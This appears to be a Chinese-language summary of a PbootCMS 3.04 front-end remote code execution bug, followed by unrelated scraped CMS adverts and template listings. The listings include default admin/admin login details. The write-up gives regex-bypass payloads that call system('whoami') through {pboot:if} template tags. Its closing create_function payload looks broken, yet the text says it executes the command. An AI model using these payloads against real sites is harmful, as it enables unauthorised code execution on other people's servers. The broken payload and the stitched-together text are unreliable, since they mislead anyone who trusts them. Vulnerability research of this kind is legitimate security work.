### PbootCms-3.04前台RCE挖掘过程详解 #### 背景介绍 PbootCms是一款开源的内容管理系统（CMS），用于构建网站和管理内容。在其3.04版本中发现了一个远程代码执行（Remote Code Execution, RCE）的安全漏洞。此漏洞允许攻击者在未授权的情况下向系统注入并执行任意PHP代码。本文档基于一篇详细介绍了该漏洞挖掘过程的文章进行总结，并深入分析其技术细节。 #### 漏洞挖掘思路 在开始审计PbootCms之前，作者参考了两篇相关文章来梳理思路： 1. 第一篇文章描述了当后台配置值设置为`if`标签时，访问前台模板会解析该标签并执行其中的代码。 2. 第二篇文章提供了更广泛和灵活的方法，包括了利用前台实现RCE的技术路线。这部分对后续挖掘过程产生了重要启发。 #### 关键技术点解析 **代码分析** 挖掘过程中重点关注的是解析`if`标签的代码块。作者分析了与之相关的三个正则表达式规则： 1. `/\{pboot:if\(([^}^\$]+)\)\}([\s\S]*?)\{\/pboot:if\}/`: 此规则用于匹配包含在`{pboot:if}`和`{/pboot:if}`之间的内容，其中`if`条件语句中的参数不能包含`$`符号。 2. `/([\w]+)([\x00-\x1F\x7F\/\*\<\>\%\w\s\\\\]+)?\(/i`: 正则用于匹配函数调用，但这里并未做过多限制。 3. `/(\([\w\s\.]+\))|(\$_GET\[)|(\$_POST\[)|(\$_REQUEST\[)|(\$_COOKIE\[)|(\$_SESSION\[)|(file_put_contents)|(file_get_contents)|(fwrite)|(phpinfo)|(base64)|(`)|(shell_exec)|(eval)|(assert)|(system)|(exec)|(passthru)|(pcntl_exec)|(popen)|(proc_open)|(print_r)|(print)|(urldecode)|(chr)|(include)|(request)|(__FILE__)|(__DIR__)|(copy)|(call_user_)|(preg_replace)|(array_map)|(array_reverse)|(array_filter)|(getallheaders)|(get_headers)|(decode_string)|(htmlspecialchars)|(session_id)/i`: 正则用于检测潜在的危险函数调用，例如`system`、`eval`等。 **第三条正则表达式的改动** 与之前的版本相比，第三条正则表达式新增了`(\([\w\s\.]+\))`这一部分，意在禁止`if`标签中条件代码段内出现小括号内的内容。然而，经测试，如`xxx("xxx")`这样的形式可以绕过该限制，这意味着仍有可能通过这种方式执行代码。 **绕过技术** 为了绕过`system`函数的正则校验，可以采用如下方式： ```php strrev('metsys')('whoami'); ``` 即反转`system`字符串并调用该函数。但由于无法绕过第二条正则，直接使用上述payload会导致失败。解决方法是在`strrev`前面添加额外字符来尝试绕过，如： ```php {pboot:if(1) xxx strrev('metsys')('whoami');} ``` 这样做触发了`eval`错误，表明已成功绕过了正则校验。下一步的目标是找到一个合适的替代`xxx`的内容，使得`eval`执行时不报错。 **解决策略** 通过实验发现，可以在`strrev`前加上特殊字符或构造特定语句来规避校验。例如，可以利用`create_function`创建匿名函数的方式，来达到执行任意代码的目的。具体而言，可以构造如下payload： ```php {pboot:if(1) create_function('', 'return strrev("metsys");')(); } ``` 这样构造的payload能够绕过系统的安全检查，并执行预期的命令。 #### 结论 通过对PbootCms-3.04版本中RCE漏洞的挖掘过程进行详细分析，可以看出开发者在设计模板引擎时对安全性的考虑不足，导致了远程代码执行漏洞的存在。攻击者可通过构造特定的payload绕过正则表达式的限制，最终实现任意代码执行。此案例提醒我们在开发类似系统时，需更加谨慎地处理用户输入数据，避免类似安全漏洞的发生。

PbootCMS是一款高效、简洁、强悍的开源PHP企业网站开发建设管理系统。PbootCMS 3.0.3 更新日志：2020-10-071.修复上版本出现的地址后缀不一致问题；2.修复搜索功能多语言混乱问题；3.新增{pboot:isregister}用于js检查用户名是否已经注册；4.修复已经注册的邮箱仍然发送验证码问题；5.修复系统存在的安全问题。

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统，是一套高效、简洁、 强悍的可免费商用的PHP CMS源码，能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签，只要懂HTML就可快速开发企业网站。 系统特色 支持自定义模板 支持站点信息后台配置 支持无限极栏目 支持自定义内容模型 支持自定义内容字段 支持专题单页内容 支持列表内容管理 支持内容复制移动 支持自定义栏目地址 支持自定义内容地址 支持多语言区域建站 支持手机独立模板 支持手机版域名绑定 支持首页分页 支持页面SEO优化 支持在线留言 支持幻N组灯片轮播 支持友情链接 支持自定义表单 支持多条件筛选 支持多条件搜索 支持验证码开关 支持留言发送到多邮箱 支持API对接 支持小程序/APP开发 支持Ajax远程获取数据 支持自定义标签 支持全站伪静态 支持前端动态缓存 支持系统角色管理 支持完整角色权限管理 支持多用户在线管理 支持系统日志功能 支持数据库在线管理 支持后台在线升级 支持自定义URL模式

PbootCMS是翱云科技开发的全新内核的开源企业建站系统， 系统以高效、简洁、强悍为开发目标，能够满足各类企业网站建设的需要。 系统采用高效、简洁的模板标签，只要懂HTML就可快

图文演示：https://blog.csdn.net/m0_61505785/article/details/139417005?spm=1001.2014.3001.5502 源码是PbootCms开发的官网系统 后台非常简单明了。 程序需要授权 授权码可在PbootCMS免费生成 不需要收费 源码非常不错。可做企业官网也可以做软件工作室官网。布局非常好看。（带手机版自适应） 非历史版本：已优化 增加应用中心 微信拓客板块。仿米云优店官网。带部分数据。程序不需要装数据库 数据库是sqlite 上传就能使用。 优化 应用中心增加详情版。不在是链接。 安装说明在压缩包内。

简数采集器PbootCMS采集发布插件接口免费下载： 1. 可将采集的数据发送到PbootCMS系统； 2. PbootCMS采集发布插件接口使用需密码安全验证，安全可靠，还可以设置相同标题数据是否重复发布； 3. 发布插件通用适配大多数文章采集软件，支持http方式传输数据即可，例如火车头，八爪鱼采集器，简数采集器等； 4.PbootCMS采集发布插件安装简单：上传相应文件到服务器，修改对应参数，详情可看readme文件； 5. PbootCMS采集发布插件特别兼容简数采集器，在简数采集器端无需填写发布的字段参数（其它采集器一般需查看数据库对应表和字段名称填写），只要填写分类名称或ID即可，还支持简数采集器的自动采集发布，图片自动回传，多语言翻译，人工智能AI等功能； 6. 采集简单，输入要采集的网址，简数采集器系统会自动智能配置采集规则，而且全程可视化操作，完全不需要懂代码就可以轻松采集到数据，非常简单方便。

这是一款基于pbootcms开发的百度智能小程序插件；小程序端接入了百度小程序搜索组件、 百度小程序一站式互动组件、关注组件；网站后台接入小程序新资源提交API接口，搜索资源推送API接口。 小程序端功能介绍首页，无限加载内容列表分类页，展示网站的全部栏目列表页 自动识别无图、单图、多图详情页，展示文章、相关推荐、引导关注、语音播报、电话拨号、智能客服开关、互动组件在线留言， 提交到网站在线留言网站端功能介绍自定义banner自定义金刚位可选择首页显示的栏目自定义详情页logo图、 引导关注图片可选择是否启用智能客服支持后台推送百度小时级收录API支持后台推送百度天级收录API支持后台推送百度搜索组件资源提交

(PC+WAP)货物运输快递物流网站pbootcms模板 汽车贸易网站源码下载

(PC+WAP)门窗定制pbootcms网站模板 铝合金门窗网站源码下载 PbootCMS内核开发的网站模板，该模板适用于门窗网站、门窗网站等企业，当然其他行业也可以做，只需要把文字图片换成其他行业的即可； PC+WAP，同一个后台，数据即时同步，简单适用！附带测试数据！ 友好的seo，所有页面均都能完全自定义标题/关键词/描述，PHP程序，安全、稳定、快速；用低成本获取源源不断订单！ 后台：域名/admin.php 账号：admin 密码：admin 模板特点 1：手工书写DIV+CSS、代码精简无冗余。 2：自适应结构，全球先进技术，高端视觉体验。 3：SEO框架布局，栏目及文章页均可独立设置标题/关键词/描述。 4：附带测试数据、安装教程、入门教程、安全及备份教程。 5：后台直接修改联系方式、传真、邮箱、地址等，修改更加方便。 配置需求： 语言程序：PHP + SQLite 前端规范：html+css+jQuery 设备支持：PC端+手机端

(PC+WAP)营销型绿色市政园林绿化类pbootcms网站模板 园林建筑设计类网站源码 PbootCMS内核开发的网站模板，该模板适用于市政园林网站、园林建筑等企业，当然其他行业也可以做，只需要把文字图片换成其他行业的即可； PC+WAP，同一个后台，数据即时同步，简单适用！附带测试数据！ 友好的seo，所有页面均都能完全自定义标题/关键词/描述，PHP程序，安全、稳定、快速；用低成本获取源源不断订单！ 后台：域名/admin.php 账号：admin 密码：admin 模板特点 1：手工书写DIV+CSS、代码精简无冗余。 2：自适应结构，全球先进技术，高端视觉体验。 3：SEO框架布局，栏目及文章页均可独立设置标题/关键词/描述。 4：附带测试数据、安装教程、入门教程、安全及备份教程。 5：后台直接修改联系方式、传真、邮箱、地址等，修改更加方便。 配置需求： 语言程序：PHP + SQLite 前端规范：html+css+jQuery 设备支持：PC端